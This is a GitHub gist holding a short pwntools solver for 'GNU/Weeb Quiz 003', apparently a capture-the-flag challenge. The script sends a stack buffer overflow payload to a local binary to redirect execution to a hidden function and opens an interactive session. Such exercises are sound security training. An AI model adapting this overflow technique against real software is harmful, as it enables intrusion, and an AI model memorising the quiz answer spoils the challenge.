Skip to content

Instantly share code, notes, and snippets.

@febnug
Last active June 4, 2021 17:14
Show Gist options
  • Save febnug/1756fbb65a2a7799fb22cb236d69e2d4 to your computer and use it in GitHub Desktop.
Save febnug/1756fbb65a2a7799fb22cb236d69e2d4 to your computer and use it in GitHub Desktop.
Solver GNU/Weeb Quiz 003
# Download quiz : https://gnuweeb.org/quiz/003
from pwn import *
a = process("./003")
sec_func = p64(0x04010B9)
payload = "\x41" * 504 + "\xff" * 8 + sec_func
a.sendline(payload)
a.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment